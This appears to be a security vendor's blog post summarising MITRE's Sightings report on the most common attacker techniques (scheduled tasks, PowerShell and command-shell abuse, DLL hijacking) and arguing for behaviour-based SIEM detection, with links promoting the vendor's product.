This month, MITRE released their Sightings report, which analyzes and reports on common attacker techniques. MITRE analyzed over 6 million sightings of attacker behavior from April 2019 through July 2021. This data was reduced down to approximately 1 million sightings, and from this data, 184 unique attacker techniques were observed.
Of these techniques, 15 of them make up 90% of the observed techniques from this time period. And of those 15, the top three (Scheduled Task/Job, Command and Scripting Interpreter, and Hijack Execution Flow) make up over half (52%) of the observed techniques.
There’s a reason that these top techniques are so popular. Understanding why is an important first step to effective detection, which extends beyond what signature-based tools can provide.
Scheduled Task is a functionality to execute a command, script or program at a scheduled time in the future, or to set up triggers to execute a command on a consistent schedule. It is a core component of the Windows operating system that can’t just be turned off. Since it’s a legitimate tool that looks relatively innocuous, Scheduled Task is also a useful resource for threat actors to maintain persistence in an environment. In addition to persistence, attackers can use Scheduled Tasks to escalate their level of privilege and execute commands that they would otherwise not have permissions to complete. Scheduled Task/Job is often used to launch other techniques, according to MITRE.
Threat actors gravitate towards Scheduled Task because it’s a living-off-the-land technique that antivirus and endpoint detection software often won’t detect. It’s no surprise that it was the number one technique according to MITRE’s data.
Command and Scripting Interpreter was the second most common technique according to MITRE’s data, but it topped the list for Red Canary’s 2021 Threat Detection Report. PowerShell was the most common observed technique in 2020, affecting nearly half of Red Canary customers. MITRE’s report echoed that sentiment, with sub-techniques PowerShell and Windows Command Shell accounting for more than a third of Command and Scripting Interpreter instances.
PowerShell is like an adversary’s swiss army knife. It can be used for a variety of malicious behaviors, including executing commands, obfuscating code, and downloading payloads. Windows Command Shell, though less capable, can do something very powerful: call on any executable in the system to execute arbitrary commands, like execute batch files. In other words, admin access to PowerShell and Command Shell = God Mode.
One of Blumira’s first recommendations for Windows environments is to only allow necessary users the ability to use PowerShell. Allowing developers, security practitioners or even third-parties that are issued credentials to access PowerShell opens a major security gap that adversaries will happily take advantage of.
Learn how to detect malicious PowerShell behavior>
Hijacking execution flow is when an adversary hijacks the way that an operating system runs programs, according to MITRE. The overwhelming majority of hijack execution flow observations were associated with the sub-technique DLL search order hijacking, which enables adversaries to execute malicious payloads by hijacking the library manifest that loads DLLs.
DLL hijacking is used by groups like REvil to launch ransomware attacks. For example, the banking trojan strain Dridex used newly created DLLs in phishing emails to evade file signature detection from antivirus software. These DLLs were sideloaded via legitimate Windows binaries, making them look like legitimate software products.
One of the major takeaways from MITRE’s report — and what the three above techniques have in common — is that attackers consistently abuse legitimate system tools, also known as living off the land. Adversaries will often breach an environment and use only legitimate tools to conduct exploration and lateral movement inside that environment to locate critical systems, weaknesses, and vulnerabilities.
These behaviors often take place over a period of days/weeks, and during this time, an attacker can go undetected by endpoint detection tools because the attacker is not using anything that is known to be malicious.
This means that endpoint protection and detection tools may have a hard time detecting attacker behavior until it is too late — for example, when an attacker introduces malware into the environment. Even when EDR does alert on questionable behavior, it’s very easy for an admin to miss or dismiss an alert that looks like normal behavior without additional questionable behavior identified from other IT and security systems that provide context. A single agent alerting on a single machine often isn’t enough visibility and context to stop savvy attackers.
MITRE’s report emphasizes the importance of using security information and event management (SIEM) with detection and response capabilities to detect malicious behavior.
“Because many of the most observed techniques are associated with legitimate system activities, real-time detection analytics may miss some adversaries’ use of these techniques as they seek to avoid false positives,” the report reads. “Building robust detections and logging around these keystone techniques can therefore significantly improve an organization’s defense.”
A well-tuned SIEM is able to detect these activities because it collects and observes system logs from multiple sources. In many cases, logs indicate attacker behavior earlier in the attack stage, well before malicious tools are introduced into the environment. That means IT admins are able to remediate earlier to prevent that dreaded 2 AM call.
Detecting potentially threatening behavior and detecting known-bad file signatures are both important approaches. However, relying on “AI or ML” alone will result in a higher false positive rate and quickly become unmanageable. The behavior-based approach that a modern SIEM provides will be able to detect living off the land techniques that signature-based detection cannot. Detections that are tuned and groomed by security experts help to eliminate the noisy false positives associated with a traditional SIEM.
As attackers are using more advanced techniques and tools, a SIEM becomes a more important component of any security stack. Adversaries are actively working to ensure their tools can execute successfully even when modern endpoint detection tools are in place. Attackers have the same access to endpoint agent software as customers do and thoroughly test their attacks against them in lab environments to ensure effectiveness before using their techniques in the wild. For example, the Conti ransomware group purchased antivirus tools using shell companies and tested their malware against it every 4 hours to ensure that any capabilities added to Windows Defender wouldn’t interfere with their code.
Learn why antivirus isn’t enough to prevent ransomware>
Blumira incorporates a behavior-based approach to detect evasion techniques that antivirus and endpoint detection tools often don’t catch. Of the 15 top attacker techniques, Blumira directly maps our detection rules to 12 of these. In most cases we map to multiple sub-techniques within this list.
Our team of incident detection engineers take an intentional approach to rule design to reduce alert fatigue. They create rules based on threat-based research, reviewing how threat actors operate and their favored attack paths. Then, they pull data from threat intel reports, emulating attacks in their lab and testing the detection across customer datasets to remove false positives.
Download our data sheet to learn more about the top MITRE techniques that Blumira can detect.